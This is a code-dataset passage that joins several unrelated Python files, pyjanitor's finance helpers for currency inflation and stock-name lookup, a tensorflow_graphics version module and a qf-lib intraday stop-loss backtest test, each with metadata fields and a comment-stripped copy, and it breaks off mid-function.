+ country
+ "/indicator/FP.CPI.TOTL?date="
+ str(min(currency_year, to_year))
+ ":"
+ str(max(currency_year, to_year))
+ "&format=json"
)
result = requests.get(url)
if result.status_code != 200:
raise ConnectionError(
"WB Indicator API failed to receive a 200 "
"response from the server. "
"Please try again later."
)
# The API returns a list of two items;
# the second item in the list is what we want
inflation_dict = json.loads(result.text)[1]
# Error checking
if inflation_dict is None:
raise ValueError(
"The WB Indicator API returned nothing. "
"This likely means the currency_year and "
"to_year are outside of the year range for "
"which the WB has inflation data for the "
"specified country."
)
# Create new dict with only the year and inflation values
inflation_dict_ready = {
int(inflation_dict[i]["date"]): float(inflation_dict[i]["value"])
for i in range(len(inflation_dict))
if inflation_dict[i]["value"] is not None
}
# Error catching
if currency_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {currency_year} for {country}."
)
if to_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {to_year} for {country}."
)
inflator = (
inflation_dict_ready[to_year] / inflation_dict_ready[currency_year]
)
return inflator
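# A worked example of the inflator arithmetic above, using made-up CPI values
# rather than real World Bank data: the inflator is simply the ratio of the
# CPI index in to_year to the CPI index in currency_year.
_example_cpi = {2010: 96.2, 2020: 109.9}  # hypothetical index values
_example_inflator = _example_cpi[2020] / _example_cpi[2010]
# _example_inflator is about 1.1424, so 100.0 units of 2010 currency inflate
# to roughly 114.24 units of 2020 currency.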
@pf.register_dataframe_method
def inflate_currency(
df: pd.DataFrame,
column_name: str = None,
country: str = None,
currency_year: int = None,
to_year: int = None,
make_new_column: bool = False,
) -> pd.DataFrame:
"""
Inflates a column of monetary values from one year to another, based on
the currency's country.
The provided country can be any economy name or code from the World Bank
[list of economies]
(https://databank.worldbank.org/data/download/site-content/CLASS.xls).
**Note**: This method mutates the original DataFrame.
Method chaining usage example:
>>> import pandas as pd
>>> import janitor.finance
>>> df = pd.DataFrame({"profit":[100.10, 200.20, 300.30, 400.40, 500.50]})
>>> df
profit
0 100.1
1 200.2
2 300.3
3 400.4
4 500.5
>>> df.inflate_currency(
... column_name='profit',
... country='USA',
... currency_year=2015,
... to_year=2018,
... make_new_column=True
... )
profit profit_2018
0 100.1 106.050596
1 200.2 212.101191
2 300.3 318.151787
3 400.4 424.202382
4 500.5 530.252978
:param df: A pandas DataFrame.
:param column_name: Name of the column containing monetary
values to inflate.
:param country: The country associated with the currency being inflated.
May be any economy or code from the World Bank [List of economies]
(https://databank.worldbank.org/data/download/site-content/CLASS.xls).
:param currency_year: The currency year to inflate from.
The year should be 1960 or later.
:param to_year: The currency year to inflate to.
The year should be 1960 or later.
:param make_new_column: Generates new column for inflated currency if
True, otherwise, inflates currency in place.
:returns: The dataframe with inflated currency column.
"""
inflator = _inflate_currency(country, currency_year, to_year)
if make_new_column:
new_column_name = column_name + "_" + str(to_year)
df[new_column_name] = df[column_name] * inflator
else:
df[column_name] = df[column_name] * inflator
return df
def convert_stock(stock_symbol: str) -> str:
"""
    This function takes in a stock symbol as a parameter,
    queries an API for the company's full name, and returns it.
Functional usage example:
```python
import janitor.finance
janitor.finance.convert_stock("aapl")
```
:param stock_symbol: Stock ticker Symbol
:raises ConnectionError: Internet connection is not available
:returns: Full company name
"""
if is_connected("www.google.com"):
stock_symbol = stock_symbol.upper()
return get_symbol(stock_symbol)
else:
raise ConnectionError(
"Connection Error: Client Not Connected to Internet"
)
def get_symbol(symbol: str):
"""
    This is a helper function to get a company's full
    name based on the stock symbol.
Functional usage example:
```python
import janitor.finance
janitor.finance.get_symbol("aapl")
```
    :param symbol: The stock symbol used to query the API
        for the company's full name.
:return: Company full name
"""
result = requests.get(
"http://d.yimg.com/autoc."
+ "finance.yahoo.com/autoc?query={}®ion=1&lang=en".format(symbol)
).json()
for x in result["ResultSet"]["Result"]:
if x["symbol"] == symbol:
return x["name"]
else:
return None
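# A hedged, offline sketch of the response shape that get_symbol parses; the
# payload below is a made-up stand-in for the Yahoo autocomplete JSON and the
# helper is illustrative only.
_fake_autoc_payload = {
    "ResultSet": {
        "Result": [
            {"symbol": "AAPL", "name": "Apple Inc."},
            {"symbol": "AAPLW", "name": "Apple Inc. When Issued"},
        ]
    }
}

def _lookup_name(payload, symbol):
    for x in payload["ResultSet"]["Result"]:
        if x["symbol"] == symbol:
            return x["name"]
    return None

# _lookup_name(_fake_autoc_payload, "AAPL") -> "Apple Inc."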
| 29.384718
| 107
| 0.57356
|
import json
from datetime import date
from functools import lru_cache
import pandas as pd
import pandas_flavor as pf
import requests
from janitor.errors import JanitorError
from .utils import check, deprecated_alias, is_connected
currency_set = {
"AUD",
"BGN",
"BRL",
"CAD",
"CHF",
"CNY",
"CZK",
"DKK",
"EUR",
"GBP",
"HKD",
"HRK",
"HUF",
"IDR",
"ILS",
"INR",
"ISK",
"JPY",
"KRW",
"MXN",
"MYR",
"NOK",
"NZD",
"PHP",
"PLN",
"RON",
"RUB",
"SEK",
"SGD",
"THB",
"TRY",
"USD",
"ZAR",
}
wb_country_dict = {
"Aruba": "ABW",
"Afghanistan": "AFG",
"Angola": "AGO",
"Albania": "ALB",
"Andorra": "AND",
"Arab World": "ARB",
"United Arab Emirates": "ARE",
"Argentina": "ARG",
"Armenia": "ARM",
"American Samoa": "ASM",
"Antigua and Barbuda": "ATG",
"Australia": "AUS",
"Austria": "AUT",
"Azerbaijan": "AZE",
"Burundi": "BDI",
"Belgium": "BEL",
"Benin": "BEN",
"Burkina Faso": "BFA",
"Bangladesh": "BGD",
"Bulgaria": "BGR",
"Bahrain": "BHR",
"Bahamas, The": "BHS",
"Bosnia and Herzegovina": "BIH",
"Belarus": "BLR",
"Belize": "BLZ",
"Bermuda": "BMU",
"Bolivia": "BOL",
"Brazil": "BRA",
"Barbados": "BRB",
"Brunei Darussalam": "BRN",
"Bhutan": "BTN",
"Botswana": "BWA",
"Central African Republic": "CAF",
"Canada": "CAN",
"Central Europe and the Baltics": "CEB",
"Switzerland": "CHE",
"Channel Islands": "CHI",
"Chile": "CHL",
"China": "CHN",
"Cote d'Ivoire": "CIV",
"Cameroon": "CMR",
"Congo, Dem. Rep.": "COD",
"Congo, Rep.": "COG",
"Colombia": "COL",
"Comoros": "COM",
"Cabo Verde": "CPV",
"Costa Rica": "CRI",
"Caribbean small states": "CSS",
"Cuba": "CUB",
"Curacao": "CUW",
"Cayman Islands": "CYM",
"Cyprus": "CYP",
"Czech Republic": "CZE",
"Germany": "DEU",
"Djibouti": "DJI",
"Dominica": "DMA",
"Denmark": "DNK",
"Dominican Republic": "DOM",
"Algeria": "DZA",
"East Asia & Pacific (excluding high income)": "EAP",
"Early-demographic dividend": "EAR",
"East Asia & Pacific": "EAS",
"Europe & Central Asia (excluding high income)": "ECA",
"Europe & Central Asia": "ECS",
"Ecuador": "ECU",
"Egypt, Arab Rep.": "EGY",
"Euro area": "EMU",
"Eritrea": "ERI",
"Spain": "ESP",
"Estonia": "EST",
"Ethiopia": "ETH",
"European Union": "EUU",
"Fragile and conflict affected situations": "FCS",
"Finland": "FIN",
"Fiji": "FJI",
"France": "FRA",
"Faroe Islands": "FRO",
"Micronesia, Fed. Sts.": "FSM",
"Gabon": "GAB",
"United Kingdom": "GBR",
"Georgia": "GEO",
"Ghana": "GHA",
"Gibraltar": "GIB",
"Guinea": "GIN",
"Gambia, The": "GMB",
"Guinea-Bissau": "GNB",
"Equatorial Guinea": "GNQ",
"Greece": "GRC",
"Grenada": "GRD",
"Greenland": "GRL",
"Guatemala": "GTM",
"Guam": "GUM",
"Guyana": "GUY",
"High income": "HIC",
"Hong Kong SAR, China": "HKG",
"Honduras": "HND",
"Heavily indebted poor countries (HIPC)": "HPC",
"Croatia": "HRV",
"Haiti": "HTI",
"Hungary": "HUN",
"IBRD only": "IBD",
"IDA & IBRD total": "IBT",
"IDA total": "IDA",
"IDA blend": "IDB",
"Indonesia": "IDN",
"IDA only": "IDX",
"Isle of Man": "IMN",
"India": "IND",
"Not classified": "INX",
"Ireland": "IRL",
"Iran, Islamic Rep.": "IRN",
"Iraq": "IRQ",
"Iceland": "ISL",
"Israel": "ISR",
"Italy": "ITA",
"Jamaica": "JAM",
"Jordan": "JOR",
"Japan": "JPN",
"Kazakhstan": "KAZ",
"Kenya": "KEN",
"Kyrgyz Republic": "KGZ",
"Cambodia": "KHM",
"Kiribati": "KIR",
"St. Kitts and Nevis": "KNA",
"Korea, Rep.": "KOR",
"Kuwait": "KWT",
"Latin America & Caribbean (excluding high income)": "LAC",
"Lao PDR": "LAO",
"Lebanon": "LBN",
"Liberia": "LBR",
"Libya": "LBY",
"St. Lucia": "LCA",
"Latin America & Caribbean": "LCN",
"Least developed countries: UN classification": "LDC",
"Low income": "LIC",
"Liechtenstein": "LIE",
"Sri Lanka": "LKA",
"Lower middle income": "LMC",
"Low & middle income": "LMY",
"Lesotho": "LSO",
"Late-demographic dividend": "LTE",
"Lithuania": "LTU",
"Luxembourg": "LUX",
"Latvia": "LVA",
"Macao SAR, China": "MAC",
"St. Martin (French part)": "MAF",
"Morocco": "MAR",
"Monaco": "MCO",
"Moldova": "MDA",
"Madagascar": "MDG",
"Maldives": "MDV",
"Middle East & North Africa": "MEA",
"Mexico": "MEX",
"Marshall Islands": "MHL",
"Middle income": "MIC",
"North Macedonia": "MKD",
"Mali": "MLI",
"Malta": "MLT",
"Myanmar": "MMR",
"Middle East & North Africa (excluding high income)": "MNA",
"Montenegro": "MNE",
"Mongolia": "MNG",
"Northern Mariana Islands": "MNP",
"Mozambique": "MOZ",
"Mauritania": "MRT",
"Mauritius": "MUS",
"Malawi": "MWI",
"Malaysia": "MYS",
"North America": "NAC",
"Namibia": "NAM",
"New Caledonia": "NCL",
"Niger": "NER",
"Nigeria": "NGA",
"Nicaragua": "NIC",
"Netherlands": "NLD",
"Norway": "NOR",
"Nepal": "NPL",
"Nauru": "NRU",
"New Zealand": "NZL",
"OECD members": "OED",
"Oman": "OMN",
"Other small states": "OSS",
"Pakistan": "PAK",
"Panama": "PAN",
"Peru": "PER",
"Philippines": "PHL",
"Palau": "PLW",
"Papua New Guinea": "PNG",
"Poland": "POL",
"Pre-demographic dividend": "PRE",
"Puerto Rico": "PRI",
"Korea, Dem. People's Rep.": "PRK",
"Portugal": "PRT",
"Paraguay": "PRY",
"West Bank and Gaza": "PSE",
"Pacific island small states": "PSS",
"Post-demographic dividend": "PST",
"French Polynesia": "PYF",
"Qatar": "QAT",
"Romania": "ROU",
"Russian Federation": "RUS",
"Rwanda": "RWA",
"South Asia": "SAS",
"Saudi Arabia": "SAU",
"Sudan": "SDN",
"Senegal": "SEN",
"Singapore": "SGP",
"Solomon Islands": "SLB",
"Sierra Leone": "SLE",
"El Salvador": "SLV",
"San Marino": "SMR",
"Somalia": "SOM",
"Serbia": "SRB",
"Sub-Saharan Africa (excluding high income)": "SSA",
"South Sudan": "SSD",
"Sub-Saharan Africa": "SSF",
"Small states": "SST",
"Sao Tome and Principe": "STP",
"Suriname": "SUR",
"Slovak Republic": "SVK",
"Slovenia": "SVN",
"Sweden": "SWE",
"Eswatini": "SWZ",
"Sint Maarten (Dutch part)": "SXM",
"Seychelles": "SYC",
"Syrian Arab Republic": "SYR",
"Turks and Caicos Islands": "TCA",
"Chad": "TCD",
"East Asia & Pacific (IDA & IBRD countries)": "TEA",
"Europe & Central Asia (IDA & IBRD countries)": "TEC",
"Togo": "TGO",
"Thailand": "THA",
"Tajikistan": "TJK",
"Turkmenistan": "TKM",
"Latin America & the Caribbean (IDA & IBRD countries)": "TLA",
"Timor-Leste": "TLS",
"Middle East & North Africa (IDA & IBRD countries)": "TMN",
"Tonga": "TON",
"South Asia (IDA & IBRD)": "TSA",
"Sub-Saharan Africa (IDA & IBRD countries)": "TSS",
"Trinidad and Tobago": "TTO",
"Tunisia": "TUN",
"Turkey": "TUR",
"Tuvalu": "TUV",
"Tanzania": "TZA",
"Uganda": "UGA",
"Ukraine": "UKR",
"Upper middle income": "UMC",
"Uruguay": "URY",
"United States": "USA",
"Uzbekistan": "UZB",
"St. Vincent and the Grenadines": "VCT",
"Venezuela, RB": "VEN",
"British Virgin Islands": "VGB",
"Virgin Islands (U.S.)": "VIR",
"Vietnam": "VNM",
"Vanuatu": "VUT",
"World": "WLD",
"Samoa": "WSM",
"Kosovo": "XKX",
"Yemen, Rep.": "YEM",
"South Africa": "ZAF",
"Zambia": "ZMB",
"Zimbabwe": "ZWE",
}
def _check_currency(currency: str):
if currency not in currency_set:
raise ValueError(
f"currency {currency} not in supported currency set, "
f"{currency_set}"
)
def _check_wb_country(country: str):
if (country not in wb_country_dict.keys()) & (
country not in wb_country_dict.values()
):
raise ValueError(
f"country {country} not in supported World Bank country dict, "
f"{wb_country_dict}"
)
def _check_wb_years(year: int):
if year < 1960:
raise ValueError("year value must be 1960 or later")
# Currency conversion for Pandas DataFrame column.
# Helper function for `convert_currency` method.
# The API used is https://exchangeratesapi.io/.
# """
@pf.register_dataframe_method
@deprecated_alias(colname="column_name")
def convert_currency(
df: pd.DataFrame,
api_key: str,
column_name: str = None,
from_currency: str = None,
to_currency: str = None,
historical_date: date = None,
make_new_column: bool = False,
) -> pd.DataFrame:
raise JanitorError(
"The `convert_currency` function has been temporarily disabled due to "
"exchangeratesapi.io disallowing free pinging of its API. "
"(Our tests started to fail due to this issue.) "
"There is no easy way around this problem "
"except to find a new API to call on."
"Please comment on issue #829 "
"(https://github.com/pyjanitor-devs/pyjanitor/issues/829) "
"if you know of an alternative API that we can call on, "
"otherwise the function will be removed in pyjanitor's 1.0 release."
)
# @pf.register_dataframe_method
# @deprecated_alias(colname="column_name")
# def convert_currency(
# df: pd.DataFrame,
# api_key: str,
# column_name: str = None,
# from_currency: str = None,
# to_currency: str = None,
# historical_date: date = None,
# make_new_column: bool = False,
# ) -> pd.DataFrame:
# """
# Converts a column from one currency to another, with an option to
# convert based on historical exchange values.
# On April 10 2021,
# we discovered that there was no more free API available.
# Thus, an API key is required to perform currency conversion.
# API keys should be set as an environment variable,
# for example, `EXCHANGE_RATE_API_KEY``,
# and then passed into the function
# by calling on `os.getenv("EXCHANGE_RATE_APIKEY")``.
# :param df: A pandas dataframe.
# :param api_key: exchangeratesapi.io API key.
# :param column_name: Name of the new column. Should be a string, in order
# for the column name to be compatible with the Feather binary
# format (this is a useful thing to have).
# :param from_currency: The base currency to convert from.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param to_currency: The target currency to convert to.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param historical_date: If supplied,
# get exchange rate on a certain date.
# If not supplied, get the latest exchange rate.
# The exchange rates go back to Jan. 4, 1999.
# :param make_new_column: Generates new column
# for converted currency if True,
# otherwise, converts currency in place.
# :returns: The dataframe with converted currency column.
# .. code-block:: python
# import pandas as pd
# import janitor
# from datetime import date
# data_dict = {
# "a": [1.23452345, 2.456234, 3.2346125] * 3,
# "Bell__Chart": [1/3, 2/7, 3/2] * 3,
# "decorated-elephant": [1/234, 2/13, 3/167] * 3,
# "animals": ["rabbit", "leopard", "lion"] * 3,
# "cities": ["Cambridge", "Shanghai", "Basel"] * 3,
# }
# example_dataframe = pd.DataFrame(data_dict)
# Example: Converting a column from one currency to another
# using rates from 01/01/2018.
# .. code-block:: python
# example_dataframe.convert_currency('a', from_currency='USD',
# to_currency='EUR', historical_date=date(2018,1,1))
# Output:
# .. code-block:: python
# a Bell__Chart decorated-elephant animals cities
# 0 1.029370 0.333333 0.004274 rabbit Cambridge
# 1 2.048056 0.285714 0.153846 leopard Shanghai
# 2 2.697084 1.500000 0.017964 lion Basel
# 3 1.029370 0.333333 0.004274 rabbit Cambridge
# 4 2.048056 0.285714 0.153846 leopard Shanghai
# 5 2.697084 1.500000 0.017964 lion Basel
# 6 1.029370 0.333333 0.004274 rabbit Cambridge
# 7 2.048056 0.285714 0.153846 leopard Shanghai
# 8 2.697084 1.500000 0.017964 lion Basel
# """
# rate = _convert_currency(
# api_key, from_currency, to_currency, historical_date
# )
# if make_new_column:
# # new_column_name = column_name + "_" + to_currency
# column_name = column_name + "_" + to_currency
# df = df.assign(column_name=df[column_name] * rate)
# return df
@lru_cache(maxsize=32)
def _inflate_currency(
country: str = None, currency_year: int = None, to_year: int = None
) -> float:
# Check all inputs are correct data type
check("country", country, [str])
check("currency_year", currency_year, [int])
check("to_year", to_year, [int])
# Get WB country abbreviation
_check_wb_country(country)
if country in wb_country_dict.keys():
country = wb_country_dict[country]
else:
# `country` is already a correct abbreviation; do nothing
pass
_check_wb_years(currency_year)
_check_wb_years(to_year)
url = (
"https://api.worldbank.org/v2/country/"
+ country
+ "/indicator/FP.CPI.TOTL?date="
+ str(min(currency_year, to_year))
+ ":"
+ str(max(currency_year, to_year))
+ "&format=json"
)
result = requests.get(url)
if result.status_code != 200:
raise ConnectionError(
"WB Indicator API failed to receive a 200 "
"response from the server. "
"Please try again later."
)
# The API returns a list of two items;
# the second item in the list is what we want
inflation_dict = json.loads(result.text)[1]
# Error checking
if inflation_dict is None:
raise ValueError(
"The WB Indicator API returned nothing. "
"This likely means the currency_year and "
"to_year are outside of the year range for "
"which the WB has inflation data for the "
"specified country."
)
# Create new dict with only the year and inflation values
inflation_dict_ready = {
int(inflation_dict[i]["date"]): float(inflation_dict[i]["value"])
for i in range(len(inflation_dict))
if inflation_dict[i]["value"] is not None
}
# Error catching
if currency_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {currency_year} for {country}."
)
if to_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {to_year} for {country}."
)
inflator = (
inflation_dict_ready[to_year] / inflation_dict_ready[currency_year]
)
return inflator
@pf.register_dataframe_method
def inflate_currency(
df: pd.DataFrame,
column_name: str = None,
country: str = None,
currency_year: int = None,
to_year: int = None,
make_new_column: bool = False,
) -> pd.DataFrame:
inflator = _inflate_currency(country, currency_year, to_year)
if make_new_column:
new_column_name = column_name + "_" + str(to_year)
df[new_column_name] = df[column_name] * inflator
else:
df[column_name] = df[column_name] * inflator
return df
def convert_stock(stock_symbol: str) -> str:
if is_connected("www.google.com"):
stock_symbol = stock_symbol.upper()
return get_symbol(stock_symbol)
else:
raise ConnectionError(
"Connection Error: Client Not Connected to Internet"
)
def get_symbol(symbol: str):
result = requests.get(
"http://d.yimg.com/autoc."
+ "finance.yahoo.com/autoc?query={}®ion=1&lang=en".format(symbol)
).json()
for x in result["ResultSet"]["Result"]:
if x["symbol"] == symbol:
return x["name"]
else:
return None
| true
| true
|
790b100111e59e9ef5eca65c62ba2c50de187873
| 906
|
py
|
Python
|
tensorflow_graphics/version.py
|
drebain/graphics
|
c84b7599d1f8a55ccbdd589c1a845494c17c2784
|
[
"Apache-2.0"
] | 1
|
2021-06-30T14:22:50.000Z
|
2021-06-30T14:22:50.000Z
|
tensorflow_graphics/version.py
|
drebain/graphics
|
c84b7599d1f8a55ccbdd589c1a845494c17c2784
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_graphics/version.py
|
drebain/graphics
|
c84b7599d1f8a55ccbdd589c1a845494c17c2784
|
[
"Apache-2.0"
] | 1
|
2019-10-10T06:16:30.000Z
|
2019-10-10T06:16:30.000Z
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines tensorflow_graphics version information (https://semver.org/)."""
_MAJOR_VERSION = "1"
_MINOR_VERSION = "0"
_PATCH_VERSION = "0"
_VERSION_SUFFIX = ""
__version__ = ".".join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = "{}-{}".format(__version__, _VERSION_SUFFIX)
| 31.241379
| 76
| 0.743929
|
_MAJOR_VERSION = "1"
_MINOR_VERSION = "0"
_PATCH_VERSION = "0"
_VERSION_SUFFIX = ""
__version__ = ".".join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = "{}-{}".format(__version__, _VERSION_SUFFIX)
| true
| true
|
790b1017b47f0b31f732106e2f303d9654e402d9
| 5,977
|
py
|
Python
|
qf_lib_tests/integration_tests/backtesting/alpha_model_strategy_testers/test_alpha_model_strategy_for_stop_losses_intraday.py
|
webclinic017/qf-lib
|
96463876719bba8a76c8269cef76addf3a2d836d
|
[
"Apache-2.0"
] | 198
|
2019-08-16T15:09:23.000Z
|
2022-03-30T12:44:00.000Z
|
qf_lib_tests/integration_tests/backtesting/alpha_model_strategy_testers/test_alpha_model_strategy_for_stop_losses_intraday.py
|
webclinic017/qf-lib
|
96463876719bba8a76c8269cef76addf3a2d836d
|
[
"Apache-2.0"
] | 13
|
2021-01-07T10:15:19.000Z
|
2022-03-29T13:01:47.000Z
|
qf_lib_tests/integration_tests/backtesting/alpha_model_strategy_testers/test_alpha_model_strategy_for_stop_losses_intraday.py
|
webclinic017/qf-lib
|
96463876719bba8a76c8269cef76addf3a2d836d
|
[
"Apache-2.0"
] | 29
|
2019-08-16T15:21:28.000Z
|
2022-02-23T09:53:49.000Z
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pandas as pd
from numpy.testing import assert_equal, assert_almost_equal
from qf_lib.backtesting.events.time_event.regular_time_event.market_close_event import MarketCloseEvent
from qf_lib.backtesting.events.time_event.regular_time_event.market_open_event import MarketOpenEvent
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.utils.dateutils.date_format import DateFormat
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.qf_data_array import QFDataArray
from qf_lib_tests.integration_tests.backtesting.alpha_model_strategy_testers.test_alpha_model_strategy_for_stop_losses import \
TestAlphaModelStrategy
class TestAlphaModelIntradayStrategy(TestAlphaModelStrategy):
data_start_date = str_to_date("2014-12-25 00:00:00.00", DateFormat.FULL_ISO)
data_end_date = str_to_date("2015-02-28 23:59:59.00", DateFormat.FULL_ISO)
end_date = str_to_date("2015-02-28 13:30:00.00", DateFormat.FULL_ISO)
frequency = Frequency.MIN_1
def test_stop_losses(self):
expected_transactions_quantities = \
[8130, -127, 1, -8004, 7454, -58, -7396, 6900, -6900, 6390, -44, -6346, 5718, -36]
result_transactions_quantities = [t.quantity for t in self.transactions]
assert_equal(expected_transactions_quantities, result_transactions_quantities)
expected_transactions_prices = [125, 130, 135, 235.6, 255, 260, 259.35, 280, 264.1, 285, 290, 282, 315, 320]
result_transactions_prices = [t.price for t in self.transactions]
assert_almost_equal(expected_transactions_prices, result_transactions_prices)
expected_portfolio_values = [1024390, 1064659, 1064659, 1064659, 1104677, 1144697, 1184717, 1224737, 1264757,
1264757, 1264757, 1304777, 1344797, 1384817, 1424837, 1464857, 1464857, 1464857,
1504877, 1544897, 1584917, 1624937, 1664957, 1664957, 1664957, 1704977, 1744997,
1785017, 1825037, 1865057, 1865057, 1865057, 1905077, 1945097, 1985117, 1885867.4,
1908229.4, 1908229.4, 1908229.4, 1945325.4, 1982305.4, 2019285.4, 1918330, 1808620,
1808620, 1808620, 1827790, 1859608, 1891338, 1923068, 1954798, 1954798, 1954798,
1789802, 1806956, 1835438, 1863848, 1892258, 1892258]
assert_almost_equal(expected_portfolio_values, list(self.portfolio.portfolio_eod_series()))
def _make_mock_data_array(self, tickers, fields):
all_dates_market_open = pd.date_range(start=self.data_start_date + MarketOpenEvent.trigger_time(),
end=self.data_end_date + MarketOpenEvent.trigger_time(), freq="B")
all_dates_market_close = pd.date_range(start=self.data_start_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(),
end=self.data_end_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(), freq="B")
num_of_dates = len(all_dates_market_open)
num_of_tickers = len(tickers)
num_of_fields = len(fields)
start_value = 100.0
values = np.arange(start_value, num_of_dates * num_of_tickers * num_of_fields + start_value)
reshaped_values = np.reshape(values, (num_of_dates, num_of_tickers, num_of_fields))
mocked_result_market_open = QFDataArray.create(all_dates_market_open, tickers, fields, data=reshaped_values)
mocked_result_market_close = QFDataArray.create(all_dates_market_close, tickers, fields, data=reshaped_values)
mocked_result_market_close.loc[:, :, PriceField.Low] -= 5.0
mocked_result_market_close.loc[:, :, PriceField.High] += 5.0
all_dates = all_dates_market_open.union(all_dates_market_close)
mocked_result = QFDataArray.create(all_dates, tickers, fields)
mocked_result.loc[all_dates_market_open, :, :] = mocked_result_market_open.loc[:, :, :]
mocked_result.loc[all_dates_market_close, :, :] = mocked_result_market_close.loc[:, :, :]
self._add_test_cases(mocked_result, tickers)
return mocked_result
def _add_test_cases(self, mocked_result, tickers):
# single low price breaking the stop level
mocked_result.loc[
str_to_date('2015-02-05 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
# two consecutive low prices breaking the stop level
mocked_result.loc[
str_to_date('2015-02-12 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-13 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
# single open price breaking the stop level
mocked_result.loc[
str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 25.0
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Open] = \
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low]
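# Reading of the fixture above (an interpretation of the test data, not a claim
# about the backtester's internals): the first three adjustments only lower
# PriceField.Low, so the stop level is pierced intrabar, while the last case
# also copies the lowered Low into PriceField.Open, so that bar already opens
# below the stop level and exercises the gap-through-the-stop-at-open path.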
| 60.373737
| 145
| 0.704367
|
import numpy as np
import pandas as pd
from numpy.testing import assert_equal, assert_almost_equal
from qf_lib.backtesting.events.time_event.regular_time_event.market_close_event import MarketCloseEvent
from qf_lib.backtesting.events.time_event.regular_time_event.market_open_event import MarketOpenEvent
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.utils.dateutils.date_format import DateFormat
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.qf_data_array import QFDataArray
from qf_lib_tests.integration_tests.backtesting.alpha_model_strategy_testers.test_alpha_model_strategy_for_stop_losses import \
TestAlphaModelStrategy
class TestAlphaModelIntradayStrategy(TestAlphaModelStrategy):
data_start_date = str_to_date("2014-12-25 00:00:00.00", DateFormat.FULL_ISO)
data_end_date = str_to_date("2015-02-28 23:59:59.00", DateFormat.FULL_ISO)
end_date = str_to_date("2015-02-28 13:30:00.00", DateFormat.FULL_ISO)
frequency = Frequency.MIN_1
def test_stop_losses(self):
expected_transactions_quantities = \
[8130, -127, 1, -8004, 7454, -58, -7396, 6900, -6900, 6390, -44, -6346, 5718, -36]
result_transactions_quantities = [t.quantity for t in self.transactions]
assert_equal(expected_transactions_quantities, result_transactions_quantities)
expected_transactions_prices = [125, 130, 135, 235.6, 255, 260, 259.35, 280, 264.1, 285, 290, 282, 315, 320]
result_transactions_prices = [t.price for t in self.transactions]
assert_almost_equal(expected_transactions_prices, result_transactions_prices)
expected_portfolio_values = [1024390, 1064659, 1064659, 1064659, 1104677, 1144697, 1184717, 1224737, 1264757,
1264757, 1264757, 1304777, 1344797, 1384817, 1424837, 1464857, 1464857, 1464857,
1504877, 1544897, 1584917, 1624937, 1664957, 1664957, 1664957, 1704977, 1744997,
1785017, 1825037, 1865057, 1865057, 1865057, 1905077, 1945097, 1985117, 1885867.4,
1908229.4, 1908229.4, 1908229.4, 1945325.4, 1982305.4, 2019285.4, 1918330, 1808620,
1808620, 1808620, 1827790, 1859608, 1891338, 1923068, 1954798, 1954798, 1954798,
1789802, 1806956, 1835438, 1863848, 1892258, 1892258]
assert_almost_equal(expected_portfolio_values, list(self.portfolio.portfolio_eod_series()))
def _make_mock_data_array(self, tickers, fields):
all_dates_market_open = pd.date_range(start=self.data_start_date + MarketOpenEvent.trigger_time(),
end=self.data_end_date + MarketOpenEvent.trigger_time(), freq="B")
all_dates_market_close = pd.date_range(start=self.data_start_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(),
end=self.data_end_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(), freq="B")
num_of_dates = len(all_dates_market_open)
